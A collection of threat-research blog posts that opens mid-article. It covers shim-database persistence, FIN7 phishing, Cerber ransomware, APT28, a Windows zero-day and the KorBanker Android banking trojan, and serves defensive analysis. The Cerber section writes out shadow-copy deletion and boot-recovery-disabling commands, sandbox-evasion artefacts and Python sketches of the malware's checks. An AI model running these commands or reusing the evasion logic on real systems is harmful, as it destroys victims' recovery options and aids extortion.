Figure 8: Parsed patch structure from the shim database file

The shellcode stored within the registry path “HKLM\SOFTWARE\Microsoft\DRM” used the API function “RtlDecompressBuffer” to decompress the payload. It then slept for four minutes before calling the CARBANAK DLL payload's entry point on the system. Once loaded in memory, it created a new process named “svchost.exe” that contained the CARBANAK DLL. 

Bringing it Together

Figure 9 provides a high-level overview of a shim database being leveraged as a persistent mechanism for utilizing an in-memory patch, injecting shellcode into the 64-bit version of “services.exe”.

Figure 9: Shim database code injection process


Mandiant recommends the following to detect malicious application shimming in an environment:

  1. Monitor for new shim database files created in the default shim database directories of “C:\Windows\AppPatch\Custom” and “C:\Windows\AppPatch\Custom\Custom64”
  2. Monitor for registry key creation and/or modification events for the keys of “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom” and “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\InstalledSDB”
  3. Monitor process execution events and command line arguments for malicious use of the “sdbinst.exe” utility 
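As a rough sketch of how those three recommendations could be applied to collected endpoint telemetry (a simplified triage function of our own design, not FireEye detection logic):

```python
SHIM_DIRS = (
    r"C:\Windows\AppPatch\Custom",
    r"C:\Windows\AppPatch\Custom\Custom64",
)
SHIM_KEYS = (
    r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom",
    r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\InstalledSDB",
)

def is_suspicious(event_type: str, value: str) -> bool:
    """Flag telemetry events matching the three recommendations above."""
    v = value.lower()
    if event_type == "file_create":   # new .sdb in a default shim directory
        return v.endswith(".sdb") and any(v.startswith(d.lower()) for d in SHIM_DIRS)
    if event_type == "reg_write":     # writes under the AppCompatFlags keys
        return any(v.startswith(k.lower()) for k in SHIM_KEYS)
    if event_type == "process":       # sdbinst.exe execution
        return "sdbinst" in v
    return False

assert is_suspicious("process", r"C:\Windows\System32\sdbinst.exe -q evil.sdb")
assert is_suspicious("file_create", r"C:\Windows\AppPatch\Custom\{guid}.sdb")
```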

Introducing Monitor for macOS

UPDATE 2 (Oct. 24, 2018): Monitor now supports macOS 10.14.

UPDATE (April 4, 2018): Monitor now supports macOS 10.13.

As a malware analyst or systems programmer, having a suite of solid dynamic analysis tools is vital to being quick and effective. These tools enable us to understand malware capabilities and undocumented components of the operating system. One obvious tool that comes to mind is Procmon from Microsoft's legendary Sysinternals Suite. The Sysinternals tools only work on Windows, though, and we love macOS.

macOS has some fantastic dynamic instrumentation software included with the operating system and Xcode. In the past, we have used dynamic instrumentation tools such as DTrace, a very powerful tracing subsystem built into the core of macOS. While it is powerful and efficient, it commonly required us to write D scripts to extract the interesting bits. We wanted something simpler.

Today, the Innovation and Custom Engineering (ICE) Applied Research team presents the public release of Monitor for macOS, a simple GUI application for monitoring common system events on a macOS host. Monitor captures the following event types:

  • Process execution with command line arguments
  • File creates (if data is written)
  • File renames
  • Network activity
  • DNS requests and replies
  • Dynamic library loads
  • TTY events

Monitor identifies system activities using a kernel extension (kext). Its focus is on capturing data that matters, with context. These events are presented in the UI with a rich search capability, allowing users to hunt through event data for areas of interest.

The goal of Monitor is simplicity. When launching Monitor, the user is prompted for root credentials to launch a process and load our kext (don’t worry, the main UI process doesn’t run as root). From there, the user can click on the start button and watch the events roll in!

The UI is sparse with a few key features. There is the start/stop button, filter buttons, and a search bar. The search bar allows us to set simple filters on types of data we may want to filter or search for over all events. The event table is a listing of all the events Monitor is capable of presenting to the user. The filter buttons allow the user to turn off some classes of events. For example, if a TimeMachine backup were to kick off when the user was trying to analyze a piece of malware, the user can click the file system filter button and the file write events won’t clutter the display.

As an example, perhaps we are interested in seeing any processes that communicated with a particular domain. We can simply use an “Any” filter and enter xkcd into the search bar, as seen in Figure 1.

Figure 1: User Interface

We think you will be surprised how useful Monitor can be when trying to figure out how components of macOS or even malware work under the hood, all without firing up a debugger or D script.

Click here to download Monitor. Please send us any feature requests and bug reports.

Apple, Mac and MacOS are registered trademarks or trademarks of Apple Inc.

M-Trends 2017: A View From the Front Lines

Every year Mandiant responds to a large number of cyber attacks, and 2016 was no exception. For our M-Trends 2017 report, we took a look at the incidents we investigated last year and provided a global and regional (the Americas, APAC and EMEA) analysis focused on attack trends, and defensive and emerging trends.

When it comes to attack trends, we’re seeing a much higher degree of sophistication than ever before. Nation-states continue to set a high bar for sophisticated cyber attacks, but some financial threat actors have caught up to the point where we no longer see the line separating the two. These groups have greatly upped their game and are thinking outside the box as well. One unexpected tactic we observed is attackers calling targets directly, showing us that they have become more brazen.

While there has been a marked acceleration of both the aggressiveness and sophistication of cyber attacks, defensive capabilities have been slower to evolve. We have observed that a majority of both victim organizations and those working diligently on defensive improvements are still lacking adequate fundamental security controls and capabilities to either prevent breaches or to minimize the damages and consequences of an inevitable compromise.

Fortunately, we’re seeing that organizations are becoming better at identifying breaches. The global median time from compromise to discovery has dropped significantly, from 146 days in 2015 to 99 days in 2016, but it’s still not good enough. As we noted in M-Trends 2016, Mandiant’s Red Team can obtain access to domain administrator credentials within roughly three days of gaining initial access to an environment, so 99 days is still 96 days too long.

We strongly recommend that organizations adopt a posture of continuous cyber security, risk evaluation and adaptive defense or they risk having significant gaps in both fundamental security controls and – more critically – visibility and detection of targeted attacks.

On top of our analysis of recent trends, M-Trends 2017 contains insights from our FireEye as a Service (FaaS) teams for the second consecutive year. FaaS monitors organizations 24/7, which gives them a unique perspective into the current threat landscape. Additionally, this year we partnered with law firm DLA Piper for a discussion of the upcoming changes in EMEA data protection laws.

You can learn more in our M-Trends 2017 report. Additionally, you can register for our live webinar on March 29, 2017, to hear more from our experts.

FIN7 Spear Phishing Campaign Targets Personnel Involved in SEC Filings

In late February 2017, FireEye as a Service (FaaS) identified a spear phishing campaign that appeared to be targeting personnel involved with United States Securities and Exchange Commission (SEC) filings at various organizations. Based on multiple identified overlaps in infrastructure and the use of similar tools, tactics, and procedures (TTPs), we have high confidence that this campaign is associated with the financially motivated threat group tracked by FireEye as FIN7.

FIN7 is a financially motivated intrusion set that selectively targets victims and uses spear phishing to distribute its malware. We have observed FIN7 attempt to compromise diverse organizations for malicious operations – usually involving the deployment of point-of-sale malware – primarily against the retail and hospitality industries.

Spear Phishing Campaign

All of the observed intended recipients of the spear phishing campaign appeared to be involved with SEC filings for their respective organizations. Many of the recipients were even listed in their company’s SEC filings. The sender email address was spoofed as EDGAR <> and the attachment was named “Important_Changes_to_Form10_K.doc” (MD5: d04b6410dddee19adec75f597c52e386). An example email is shown in Figure 1.

Figure 1: Example of a phishing email sent during this campaign

We have observed the following TTPs with this campaign:

  • The malicious documents drop a VBS script that installs a PowerShell backdoor, which uses DNS TXT records for its command and control. This backdoor appears to be a new malware family that FireEye iSIGHT Intelligence has dubbed POWERSOURCE. POWERSOURCE is a heavily obfuscated and modified version of the publicly available tool DNS_TXT_Pwnage. The backdoor uses DNS TXT requests for command and control and is installed in the registry or Alternate Data Streams. Using DNS TXT records to communicate is not an entirely new finding, but it should be noted that this has been a rising trend since 2013 likely because it makes detection and hunting for command and control traffic difficult.
  • We also observed POWERSOURCE being used to download a second-stage PowerShell backdoor called TEXTMATE in an effort to further infect the victim machine. The TEXTMATE backdoor provides a reverse shell to attackers and uses DNS TXT queries to tunnel interactive commands and other data. TEXTMATE is “memory resident” – often described as “fileless” malware. This is not a novel technique by any means, but it’s worth noting since it presents detection challenges and further speaks to the threat actor’s ability to remain stealthy and nimble in operations.
  • In some cases, we identified a Cobalt Strike Beacon payload being delivered via POWERSOURCE. This particular Cobalt Strike stager payload was previously used in operations linked to FIN7.
  • We observed that the same domain hosting the Cobalt Strike Beacon payload was also hosting a CARBANAK backdoor sample compiled in February 2017. CARBANAK malware has been used heavily by FIN7 in previous operations.
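The DNS TXT channel mentioned in the first two bullets works because arbitrary data can be Base64-encoded and split across TXT-record character-strings, each of which holds at most 255 bytes. A hedged sketch of the encoding side (our own simplification, not POWERSOURCE's actual protocol):

```python
import base64

MAX_TXT_STRING = 255  # per-string size limit for a DNS TXT record

def to_txt_chunks(payload: bytes) -> list[str]:
    """Base64-encode a payload and split it into TXT-sized strings."""
    b64 = base64.b64encode(payload).decode("ascii")
    return [b64[i:i + MAX_TXT_STRING] for i in range(0, len(b64), MAX_TXT_STRING)]

def from_txt_chunks(chunks: list[str]) -> bytes:
    """Reassemble and decode the payload on the receiving side."""
    return base64.b64decode("".join(chunks))

data = b"A" * 1000
chunks = to_txt_chunks(data)
assert all(len(c) <= MAX_TXT_STRING for c in chunks)
assert from_txt_chunks(chunks) == data
```

Because the carrier is ordinary DNS traffic, this kind of channel tends to blend in, which is consistent with the detection difficulty noted above.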

Thus far, we have directly identified 11 targeted organizations in the following sectors:

  • Financial services, with different victims having insurance, investment, card services, and loan focuses
  • Transportation
  • Retail
  • Education
  • IT services
  • Electronics

All these organizations are based in the United States, and many have international presences. As the SEC is a U.S. regulatory organization, we would expect recipients of these spear phishing attempts to either work for U.S.-based organizations or be U.S.-based representatives of organizations located elsewhere. However, it is possible that the attackers could perform similar activity mimicking other regulatory organizations in other countries.


We have not yet identified FIN7’s ultimate goal in this campaign, as we have either blocked the delivery of the malicious emails or our FaaS team detected and contained the attack early enough in the lifecycle before we observed any data targeting or theft.  However, we surmise FIN7 can profit from compromised organizations in several ways. If the attackers are attempting to compromise persons involved in SEC filings due to their information access, they may ultimately be pursuing securities fraud or other investment abuse. Alternatively, if they are tailoring their social engineering to these individuals, but have other goals once they have established a foothold, they may intend to pursue one of many other fraud types.

Previous FIN7 operations deployed multiple point-of-sale malware families for the purpose of collecting and exfiltrating sensitive financial data. The use of the CARBANAK malware in FIN7 operations also provides limited evidence that these campaigns are linked to previously observed CARBANAK operations leading to fraudulent banking transactions, ATM compromise, and other monetization schemes.

Community Protection Event

FireEye implemented a Community Protection Event – spanning FaaS, Mandiant, Intelligence, and Products – to secure all clients affected by this campaign. In this instance, an incident detected by FaaS led the FireEye Labs Advanced Reverse Engineering team to quickly analyze the malware, after which new detections were deployed across the suite of FireEye products.

The FireEye iSIGHT Intelligence MySIGHT Portal contains additional information based on our investigations of a variety of topics discussed in this post, including FIN7 and the POWERSOURCE and TEXTMATE malware. Click here for more information.

Cerber: Analyzing a Ransomware Attack Methodology To Enable Protection

Ransomware is a common method of cyber extortion for financial gain that typically involves users being unable to interact with their files, applications or systems until a ransom is paid. Accessibility of cryptocurrency such as Bitcoin has directly contributed to this ransomware model. Based on data from FireEye Dynamic Threat Intelligence (DTI), ransomware activities have been rising fairly steadily since mid-2015.

On June 10, 2016, FireEye’s HX detected a Cerber ransomware campaign involving the distribution of emails with a malicious Microsoft Word document attached. If a recipient opened the document, a malicious macro would contact an attacker-controlled website to download and install the Cerber family of ransomware.

Exploit Guard, a major new feature of FireEye Endpoint Security (HX), detected the threat and alerted HX customers on infections in the field so that organizations could inhibit the deployment of Cerber ransomware. After investigating further, the FireEye research team worked with security agency CERT-Netherlands, as well as web hosting providers who unknowingly hosted the Cerber installer, and were able to shut down that instance of the Cerber command and control (C2) within hours of detecting the activity. With the attacker-controlled servers offline, macros and other malicious payloads configured to download are incapable of infecting users with ransomware.

FireEye hasn’t seen any additional infections from this attacker since shutting down the C2 server, although the attacker could configure one or more additional C2 servers and resume the campaign at any time. This particular campaign was observed on six unique endpoints from three different FireEye endpoint security customers. HX has proven effective at detecting and inhibiting the success of Cerber malware.

Attack Process

The Cerber ransomware attack cycle we observed can be broadly broken down into eight steps:

  1. Target receives and opens a Word document.
  2. Macro in document is invoked to run PowerShell in hidden mode.
  3. Control is passed to PowerShell, which connects to a malicious site to download the ransomware.
  4. On successful connection, the ransomware is written to the disk of the victim.
  5. PowerShell executes the ransomware.
  6. The malware configures multiple concurrent persistence mechanisms by creating command processor, screensaver, and runonce registry entries.
  7. The executable uses native Windows utilities such as WMIC and/or VSSAdmin to delete backups and shadow copies.
  8. Files are encrypted and messages are presented to the user requesting payment.

Rather than waiting for the payload to be downloaded or started around stage four or five of the aforementioned attack cycle, Exploit Guard provides coverage for most steps of the attack cycle – beginning in this case at the second step.

The most common way to deliver ransomware is via Word documents with embedded macros or a Microsoft Office exploit. FireEye Exploit Guard detects both of these attacks at the initial stage of the attack cycle.

PowerShell Abuse

When the victim opens the attached Word document, the malicious macro writes a small piece of VBScript into memory and executes it. This VBScript executes PowerShell to connect to an attacker-controlled server and download the ransomware (profilest.exe), as seen in Figure 1.

Figure 1. Launch sequence of Cerber – the macro is responsible for invoking PowerShell and PowerShell downloads and runs the malware

It has been increasingly common for threat actors to use malicious macros to infect users because the majority of organizations permit macros to run from Internet-sourced office documents.

In this case, we observed the macro code calling PowerShell to bypass execution policies, run with a hidden window, and pass its payload as an encoded command, with the intention that PowerShell download the ransomware and execute it without the victim’s knowledge.
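Such invocations combine flags that rarely appear together in legitimate use, which makes them reasonable triage candidates. A simple heuristic of our own (not FireEye's detection logic):

```python
def looks_like_hidden_download(cmdline: str) -> bool:
    """Flag PowerShell invocations that bypass policy, hide their window,
    or download a payload -- two or more indicators together."""
    c = cmdline.lower()
    indicators = ["-windowstyle hidden", "-executionpolicy bypass", "downloadfile"]
    return "powershell" in c and sum(i in c for i in indicators) >= 2

sample = ('powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass '
          '-Command "(New-Object Net.WebClient).DownloadFile(...)"')
assert looks_like_hidden_download(sample)
```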

Further investigation of the link and executable showed that every few seconds the malware hash changed with a more current compilation timestamp and different appended data bytes – a technique often used to evade hash-based detection.
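Appending even a single byte changes a file's hash without affecting how the executable runs, which is why hash-only blocking fails against this technique. A quick demonstration:

```python
import hashlib

payload = b"MZ" + b"\x90" * 64  # stand-in for an executable image
variant1 = payload + b"\x01"    # one build's appended bytes
variant2 = payload + b"\x02"    # the next build's appended bytes

h1 = hashlib.md5(variant1).hexdigest()
h2 = hashlib.md5(variant2).hexdigest()
assert h1 != h2  # every re-append defeats a naive hash blacklist
print(h1, h2, sep="\n")
```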

Cerber in Action

Initial payload behavior

Upon execution, the Cerber malware checks where it is being launched from. Unless it is launched from a specific location (%APPDATA%\<GUID>), it creates a copy of itself in the victim's %APPDATA% folder under a filename chosen randomly from the names in the %WINDIR%\system32 folder.

If the malware is not launched from the aforementioned folder, then, after eliminating any blacklisted filenames from an internal list, it creates a renamed copy of itself at “%APPDATA%\<GUID>” using a pseudo-randomly selected name from the “system32” directory, executes the copy from its new location, and cleans up after itself.
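The relocation logic can be sketched as a pair of small functions (our own reconstruction of the described behavior; all names and paths are illustrative):

```python
import ntpath
import random

APPDATA_GUID_DIR = r"C:\Users\victim\AppData\Roaming\{guid}"  # example path

def needs_relocation(current_path: str, install_dir: str = APPDATA_GUID_DIR) -> bool:
    """Cerber re-installs itself unless already running from %APPDATA%\\<GUID>."""
    return ntpath.dirname(current_path).lower() != install_dir.lower()

def pick_copy_name(system32_names, blacklist):
    """Pseudo-randomly pick a benign-looking name, skipping blacklisted ones."""
    candidates = [n for n in system32_names if n.lower() not in blacklist]
    return random.choice(candidates)

assert needs_relocation(r"C:\Users\victim\Downloads\profilest.exe")
assert not needs_relocation(APPDATA_GUID_DIR + r"\svchost.exe")
```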

Shadow deletion

As with many other ransomware families, Cerber bypasses UAC checks, deletes any volume shadow copies, and disables safe boot options. Cerber accomplishes this by launching the following processes with the respective arguments:

Vssadmin.exe "delete shadows /all /quiet"

WMIC.exe "shadowcopy delete"

Bcdedit.exe "/set {default} recoveryenabled no"

Bcdedit.exe "/set {default} bootstatuspolicy ignoreallfailures"


People may wonder why victims pay the ransom to the threat actors. In some cases it is as simple as needing to get files back, but in other instances a victim may feel coerced or even intimidated. We noticed these tactics being used in this campaign, where the victim is shown the message in Figure 2 upon being infected with Cerber.

Figure 2. A message to the victim after encryption

The ransomware authors attempt to incentivize the victim into paying quickly by providing a 50 percent discount if the ransom is paid within a certain timeframe, as seen in Figure 3.



Figure 3. Ransom offered to victim, which is discounted for five days

Multilingual Support

As seen in Figure 4, the Cerber ransomware presented its message and instructions in 12 different languages, indicating this attack was on a global scale.

Figure 4.   Interface provided to the victim to pay ransom supports 12 languages


Cerber targets 294 different file extensions for encryption, including .doc (typically Microsoft Word documents), .ppt (generally Microsoft PowerPoint slideshows), .jpg and other images. It also targets financial file formats such as .ibank (used with certain personal finance management software) and .wallet (used for Bitcoin).

Selective Targeting

Selective targeting was used in this campaign. The attackers were observed checking the country code of a host machine’s public IP address against a list of blacklisted countries in the JSON configuration, utilizing online services to verify the information. Blacklisted (protected) countries include: Armenia, Azerbaijan, Belarus, Georgia, Kyrgyzstan, Kazakhstan, Moldova, Russia, Turkmenistan, Tajikistan, Ukraine, and Uzbekistan.

The attack also checked the system's keyboard layout to further ensure it avoided infecting machines in the attackers' own geography: 1049—Russian, 1058—Ukrainian, 1059—Belarusian, 1064—Tajik, 1067—Armenian, 1068—Azeri (Latin), 1079—Georgian, 1087—Kazakh, 1088—Kyrgyz (Cyrillic), 1090—Turkmen, 1091—Uzbek (Latin), 2072—Romanian (Moldova), 2073—Russian (Moldova), 2092—Azeri (Cyrillic), 2115—Uzbek (Cyrillic).
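Both checks amount to set membership against the malware's configuration. A compact sketch using the keyboard LCIDs listed above and ISO 3166-1 codes for the blacklisted countries (the code representation is our assumption; function names are our own):

```python
# Blacklisted countries from the configuration, as ISO 3166-1 alpha-2 codes
# (our mapping from the country names listed above).
BLACKLISTED_COUNTRIES = {
    "AM", "AZ", "BY", "GE", "KG", "KZ", "MD", "RU", "TM", "TJ", "UA", "UZ",
}
# Keyboard-layout LCIDs from the list above.
BLACKLISTED_LAYOUTS = {
    1049, 1058, 1059, 1064, 1067, 1068, 1079, 1087, 1088, 1090, 1091,
    2072, 2073, 2092, 2115,
}

def should_abort(country_code: str, keyboard_lcid: int) -> bool:
    """Cerber skips infection if either the geo-IP country or the keyboard
    layout matches its protected-region lists."""
    return (country_code.upper() in BLACKLISTED_COUNTRIES
            or keyboard_lcid in BLACKLISTED_LAYOUTS)

assert should_abort("RU", 1033)      # Russian geo-IP
assert should_abort("US", 1058)      # Ukrainian keyboard layout
assert not should_abort("US", 1033)  # typical U.S. host proceeds
```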

Selective targeting has historically been used to keep malware from infecting endpoints within the author’s geographical region, thus protecting them from the wrath of local authorities. The actor also controls their exposure using this technique. In this case, there is reason to suspect the attackers are based in Russia or the surrounding region.

Anti VM Checks

The malware searches for a series of hooked modules, specific filenames and paths, and known sandbox volume serial numbers, including: sbiedll.dll, dir_watch.dll, api_log.dll, dbghelp.dll, Frz_State, C:\popupkiller.exe, C:\stimulator.exe, C:\TOOLS\execute.exe, \sand-box\, \cwsandbox\, \sandbox\, 0CD1A40, 6CBBC508, 774E1682, 837F873E, 8B6F64BC.

Aside from the aforementioned checks and blacklisting, there is also a wait option built in where the payload will delay execution on an infected machine before it launches an encryption routine. This technique was likely implemented to further avoid detection within sandbox environments.


Once executed, Cerber deploys the following persistence techniques to make sure a system remains infected:

  • A registry key is added to launch the malware instead of the screensaver when the system becomes idle.
  • The “CommandProcessor” Autorun keyvalue is changed to point to the Cerber payload so that the malware will be launched each time the Windows terminal, “cmd.exe”, is launched.
  • A shortcut (.lnk) file is added to the startup folder. This file references the ransomware and Windows will execute the file immediately after the infected user logs in.
  • Common persistence mechanisms, such as the run and runonce registry keys, are also used.

A Solid Defense

Mitigating ransomware malware has become a high priority for affected organizations because passive security technologies such as signature-based containment have proven ineffective.

Malware authors have demonstrated an ability to outpace most endpoint controls by compiling multiple variations of their malware with minor binary differences. By using alternative packers and compilers, authors are increasing the level of effort for researchers and reverse-engineers. Unfortunately, those efforts don’t scale.

Disabling support for macros in documents from the Internet and increasing user awareness are two ways to reduce the likelihood of infection. If you can, consider blocking connections to websites you haven’t explicitly whitelisted. However, these controls may not be sufficient to prevent all infections, or they may not be practical for your organization.

FireEye Endpoint Security with Exploit Guard helps to detect exploits and techniques used by ransomware attacks (and other threat activity) during execution and provides analysts with greater visibility. This helps your security team conduct more detailed investigations of broader categories of threats. This information enables your organization to quickly stop threats and adapt defenses as needed.


Ransomware has become an increasingly common and effective attack affecting enterprises, impacting productivity and preventing users from accessing files and data.

Mitigating the threat of ransomware requires strong endpoint controls, and may include technologies that allow security personnel to quickly analyze multiple systems and correlate events to identify and respond to threats.

HX with Exploit Guard uses behavioral intelligence to accelerate this process, quickly analyzing endpoints within your enterprise and alerting your team so they can conduct an investigation and scope the compromise in real-time.

Traditional defenses don’t have the granular view required to do this, nor can they connect the dots between discrete individual processes that may be steps in an attack. This takes behavioral intelligence that can quickly analyze a wide array of processes and alert on them so analysts and security teams can conduct a complete investigation into what has transpired, or is transpiring. This can only be done if those professionals have the right tools and visibility into all endpoint activity to find every aspect of a threat and deal with it, all in real time. At FireEye, we also go one step further and contact the relevant authorities to bring down these types of campaigns.

Click here for more information about Exploit Guard technology.

APT28: A Window into Russia’s Cyber Espionage Operations?

The role of nation-state actors in cyber attacks was perhaps most widely revealed in February 2013 when Mandiant released the APT1 report, which detailed a professional cyber espionage group based in China. Today we release a new report: APT28: A Window Into Russia’s Cyber Espionage Operations?

This report focuses on a threat group that we have designated as APT28. While APT28’s malware is fairly well known in the cybersecurity community, our report details additional information exposing ongoing, focused operations that we believe indicate a government sponsor based in Moscow.

In contrast with the China-based threat actors that FireEye tracks, APT28 does not appear to conduct widespread intellectual property theft for economic gain. Instead, APT28 focuses on collecting intelligence that would be most useful to a government. Specifically, FireEye found that since at least 2007, APT28 has been targeting privileged information related to governments, militaries and security organizations that would likely benefit the Russian government.

In our report, we also describe several malware samples containing details that indicate that the developers are Russian language speakers operating during business hours that are consistent with the time zone of Russia’s major cities, including Moscow and St. Petersburg. FireEye analysts also found that APT28 has systematically evolved its malware since 2007, using flexible and lasting platforms indicative of plans for long-term use and sophisticated coding practices that suggest an interest in complicating reverse engineering efforts.

We assess that APT28 is most likely sponsored by the Russian government based on numerous factors summarized below:

Table for APT28

FireEye is also releasing indicators to help organizations detect APT28 activity. Those indicators can be downloaded at

As with the APT1 report, we recognize that no single entity completely understands the entire complex picture of intense cyber espionage over many years. Our goal by releasing this report is to offer an assessment that informs and educates the community about attacks originating from Russia. The complete report can be downloaded here: /content/dam/legacy/resources/pdfs/apt28.pdf.

MS Windows Local Privilege Escalation Zero-Day in The Wild

FireEye Labs has identified a new Windows local privilege escalation vulnerability in the wild. The vulnerability cannot be used for remote code execution but could allow a standard user account to execute code in the kernel. Currently, the exploit appears to only work in Windows XP.

This local privilege escalation vulnerability is used in-the-wild in conjunction with an Adobe Reader exploit that appears to target a patched vulnerability. The exploit targets Adobe Reader 9.5.4, 10.1.6, 11.0.02 and prior on Windows XP SP3. Those running the latest versions of Adobe Reader should not be affected by this exploit.

Post exploitation, the shellcode decodes a PE payload from the PDF, drops it in the temporary directory, and executes it.


The following actions will protect users from the in-the-wild PDF exploit:

1) Upgrade to the latest Adobe Reader

2) Upgrade to Microsoft Windows 7 or higher

This post is intended to serve as a warning to the general public. We are collaborating with the Microsoft Security team on research activities. Microsoft assigned CVE-2013-5065 to this issue.

We will continue to update this blog as new information about this threat is found.

[Update]: Microsoft released security advisory 2914486 on this issue.

Dissecting Android KorBanker

FireEye recently identified a malicious mobile application that installs a fake banking application capable of stealing user credentials. The top-level app acts as a bogus Google Play application, falsely assuring the user that it is benign.

FireEye Mobile Threat Prevention platform detects this application as Android.KorBanker. This blog post details both the top-level installer as well as the fake banking application embedded inside the top-level app.

The app targets the following banks, all of which are based in Korea.

  • Hana Bank
  • IBK One
  • KB Kookmin Bank
  • NH Bank
  • Woori Bank
  • Shinhan Bank

Once installed, the top-level application presents itself as a Google Play application. It also asks the user for permission to activate itself as a device administrator, which gives KorBanker ultimate control over the device and helps the app stay hidden from the app menu.


The user sees the messages in Figure 1 and Figure 2.


The message in Figure 2 translates to: “Notification installation file is corrupt error has occurred. Sure you want to delete the corrupted files?”

When the user taps the “Yes” button, KorBanker hides itself from the user by calling the following Android API:

getPackageManager().setComponentEnabledSetting(new ComponentName("", ""), 2, 1)

The arguments “2” and “1” passed to the above function are explained below.

The 2 argument is the value of the COMPONENT_ENABLED_STATE_DISABLED flag, which disables the component so that the app no longer appears in the app menu.

The 1 argument is the value of the DONT_KILL_APP flag, which indicates that the app should not be killed and should continue running in the background.

After installation, the app checks whether any of the six targeted banking applications have been installed. If it finds any, it deletes the legitimate banking application and silently replaces it with a fake version. The fake versions of the banking applications are embedded in the “assets” directory of the top-level APK.

Initial registration protocol

The top-level APK and the embedded fake banking app register themselves with their respective command-and-control (CnC) servers. The following section explains the registration process.

Top-level app

The top-level app registers itself by sending the device ID of the phone to the remote CnC server packed in a JavaScript Object Notation (JSON) object. The data packet excerpt is shown in Figure 3. This is the first packet that is sent out once the app is installed on the device.


Figure 3: KorBanker data packet during registration

The packet capture shown in Figure 3 shows the structure of the registration message. The bytes highlighted in red indicate the CnC message code of 0x07 (decimal 7), which translates to the string addUserReq.

Outlined in yellow is the length indicator, 0x71 (113 bytes), followed by the JSON object containing the Device ID and the phone number of the device. The values for callSt and smsSt are statically set to 21 and 11, respectively.

The response bytes shown in black containing 0x04 and 0x01 map to the command addUserAck. They are sent by the server to acknowledge the receipt of the previously sent addUserReq. Code inside the application invokes various functions as it receives commands. These functions may exist for future updates of the application.
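Based on the captures described above (a one-byte command code, a one-byte length, then a JSON body), a minimal Python sketch of the registration message might look like the following. The JSON field names other than callSt/smsSt are assumptions for illustration; only the numeric codes and the 21/11 values come from the captures:

```python
import json
import struct

# Numeric CnC codes taken from the captures discussed in this post.
CMD = {7: "addUserReq", 4: "addUserAck", 8: "addSmsReq"}

def build_add_user_req(device_id, phone):
    # Field names other than callSt/smsSt are assumptions for illustration.
    body = json.dumps({"deviceId": device_id, "phone": phone,
                       "callSt": 21, "smsSt": 11}).encode()
    # One command byte, one length byte, then the JSON body (as in Figure 3).
    return struct.pack("BB", 7, len(body)) + body

def parse_packet(pkt):
    """Split a packet back into its command string and JSON payload."""
    code, length = pkt[0], pkt[1]
    return CMD.get(code, "unknown"), json.loads(pkt[2:2 + length])
```

A single length byte caps the body at 255 bytes, which is consistent with the small registration payload shown here but is otherwise an assumption.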


Figure 4: KorBanker code for sending incoming messages to CnC server

Once the installation of the app has been registered, the app waits for incoming messages on the phone, possibly looking for access codes that arrive as a part of two factor authentication methods for one of the six targeted banks. All incoming messages to the phone are intercepted and sent to the CnC server on port 8888 as shown in Figure 4.

The bytes highlighted in red after the response show the message code of 0x08 (decimal 8), which translates to the command addSmsReq. This is followed by the size of the message. The Device ID is sent at the end of the data packet, along with a timestamp, to identify the device on which the message was seen. The malware also suppresses the SMS notification and deletes the message from the device.

The remote CnC infrastructure is based on numeric codes. These codes are stored in a data structure in the app. All incoming messages and responses from the CnC server arrive in numeric codes and get translated into corresponding strings, which in turn drive the app to perform different tasks.

Table 1 shows the CnC commands supported by the top-level app. All the commands ending with “Req” correspond to the infected client requests made to the CnC server. All the commands ending with “Ack” indicate acknowledgements of the received commands.


Fake banking app 

Once installed, the fake banking app registers with a CnC server at a different IP address by sending the HTTP request shown below.


Figure 5: Data capture showing the installation of the fake banking app 

Once the phone is registered, the user is presented with the following fake banking login page, which prompts for banking account credentials. These credentials are stored internally in a JSON object.

The user is then prompted for a SCARD code and a 35-digit combination, which is recorded into the JSON object and sent out to the CnC server as follows:

{
    "renzheng" : "1234",
    "fenli" : "1234",
    "datetime" : "2013-08-12 12:32:32",
    "bankinid" : "1234",
    "jumin" : "1234",
    "banknum" : "1234",
    "banknumpw" : "1234",
    "paypw" : "test",
    "scard" : "1234567890",
    "sn1" : "1234",
    "sn2" : "1234",
    "sn3" : "1234",
    ...
    "sn34" : "1234",
    "sn35" : "1234"
}

The response received is as follows:

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Content-Type: text/html
Date: Fri, 22 Nov 2013 02:05:00 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT



This malware sample takes extra measures to obtain banking credentials. With the increasing use of mobile devices and the liberal permissions granted to apps that appear benign, the risk of monetary loss on the mobile front is growing. Mobile banking is not without its adversaries, and KorBanker is a vivid reminder of just how dangerous apps from untrusted sources can be.

Monitoring Vulnaggressive Apps on Google Play

Vulnaggressive Characteristics in Mobile Apps and Libraries

FireEye mobile security researchers have discovered a rapidly-growing class of mobile threats represented by popular ad libraries affecting apps with billions of downloads. These ad libraries are aggressive at collecting sensitive data and able to perform dangerous operations such as downloading and running new code on demand. They are also plagued with various classes of vulnerabilities that enable attackers to turn their aggressive behaviors against users. We coined the term “vulnaggressive” to describe this class of vulnerable and aggressive characteristics. We have published some of our findings in our two recent blogs about these threats: “Ad Vulna: A Vulnaggressive (Vulnerable & Aggressive) Adware Threatening Millions” and “Update: Ad Vulna Continues”.

As we reported in our earlier blog “Update: Ad Vulna Continues”, we have observed that some vulnaggressive apps have been removed from Google Play, and some app developers have upgraded their apps to a more secure version, either by removing the vulnaggressive libraries entirely or by upgrading the relevant libraries to a version that addresses the security issues. However, many app developers are still not aware of these security issues and have not taken the needed steps. A community effort is needed to help app developers and library vendors become more aware of these issues and address them in a timely fashion.

To aid this community effort, we present data illustrating how, over time, vulnaggressive apps have been upgraded to a more secure version or removed from Google Play after our notification. We summarize our observations below, although we do not have specific information about the reasons behind the changes we are reporting.

We currently only show the chart for one such vulnaggressive library, AppLovin (previously referred to by us as Ad Vulna for anonymity). We will add the charts for other vulnaggressive libraries as we complete our notification/disclosure process and the corresponding libraries make available new versions that fix the issues.

The Chart of Apps Affected by AppLovin

AppLovin (Vulna)’s vulnerable versions include 3.x, 4.x and 5.0.x. AppLovin 5.1 fixed most of the reported security issues. We urge app developers to upgrade AppLovin to the latest version and ask their users to update their apps as soon as the newer versions are available.

